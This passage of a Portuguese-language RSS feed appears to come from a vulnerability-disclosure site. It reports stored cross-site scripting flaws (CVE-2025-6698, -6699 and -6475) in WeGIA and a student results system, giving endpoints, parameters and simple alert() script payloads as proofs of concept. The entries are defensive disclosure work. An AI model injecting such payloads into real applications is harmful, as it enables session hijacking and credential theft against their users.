&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;Tipo&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Poc VulDBeeee&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; ;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6698/image.png&amp;#34;
	width=&amp;#34;1884&amp;#34;
	height=&amp;#34;988&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6698/image_hu_1a5d7d99e108196e.png 480w, /p/cve-2025-6698/image_hu_b87867b672dc8af6.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;190&amp;#34;
		data-flex-basis=&amp;#34;457px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6698/image-1.png&amp;#34;
	width=&amp;#34;1840&amp;#34;
	height=&amp;#34;1004&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6698/image-1_hu_f50f1b60b1eb092b.png 480w, /p/cve-2025-6698/image-1_hu_4f105eec7cbf26e6.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;183&amp;#34;
		data-flex-basis=&amp;#34;439px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6698/image-2.png&amp;#34;
	width=&amp;#34;1887&amp;#34;
	height=&amp;#34;994&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6698/image-2_hu_fb4627698ac6d751.png 480w, /p/cve-2025-6698/image-2_hu_e95ed4393ffc5db8.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;189&amp;#34;
		data-flex-basis=&amp;#34;455px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;vídeo-poc&amp;#34;&amp;gt;Vídeo PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/7P5YT5MwCjg&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/7P5YT5MwCjg&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6698.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6698.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 26 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-6699</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-6699/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-6699/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-6699-cross-site-scripting-xss-armazenado-no-endpoint-cadastro_funcionariophp-parâmetro-cpf&amp;#34;&amp;gt;CVE-2025-6699: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;cadastro_funcionario.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6699&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6699&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;cadastro_funcionario.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/html/atendido/Cadastro_Atendido.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-6699-cross-site-scripting-xss-armazenado-no-endpoint-cadastro_funcionariophp-parâmetro-cpf&amp;#34;&amp;gt;CVE-2025-6699: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;cadastro_funcionario.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6699&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6699&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;cadastro_funcionario.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/html/atendido/Cadastro_Atendido.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Poc VulDBeeee&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; ;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6699/image.png&amp;#34;
	width=&amp;#34;1857&amp;#34;
	height=&amp;#34;990&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6699/image_hu_353d8c63a12bb5cf.png 480w, /p/cve-2025-6699/image_hu_588c09aeb2830033.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;187&amp;#34;
		data-flex-basis=&amp;#34;450px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6699/image-1.png&amp;#34;
	width=&amp;#34;1897&amp;#34;
	height=&amp;#34;977&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6699/image-1_hu_2e98a5ecd10ad09a.png 480w, /p/cve-2025-6699/image-1_hu_cb0508422329be41.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;194&amp;#34;
		data-flex-basis=&amp;#34;465px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6699/image-2.png&amp;#34;
	width=&amp;#34;1888&amp;#34;
	height=&amp;#34;990&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6699/image-2_hu_b72551845a60d67a.png 480w, /p/cve-2025-6699/image-2_hu_e0f624d860a6c52d.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;190&amp;#34;
		data-flex-basis=&amp;#34;457px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;vídeo-poc&amp;#34;&amp;gt;Vídeo PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/1RlctPW0nhw&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/1RlctPW0nhw&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6699.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6699.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 26 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-6475</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-6475/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-6475/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-6475-cross-site-scripting-xss-armazenado-no-endpoint-students-parâmetro-first-name&amp;#34;&amp;gt;CVE-2025-6475: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;students&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;First Name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6475&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6475&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;students&amp;lt;/code&amp;gt; do aplicativo Student Result Management System 1.0 (SRMS 1.0) por Source Codester. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;First Name&amp;lt;/code&amp;gt; da aplicação. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-6475-cross-site-scripting-xss-armazenado-no-endpoint-students-parâmetro-first-name&amp;#34;&amp;gt;CVE-2025-6475: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;students&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;First Name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6475&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6475&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;students&amp;lt;/code&amp;gt; do aplicativo Student Result Management System 1.0 (SRMS 1.0) por Source Codester. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;First Name&amp;lt;/code&amp;gt; da aplicação. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/srms/script/admin/students&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;First Name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;First Name&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB SRMS&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
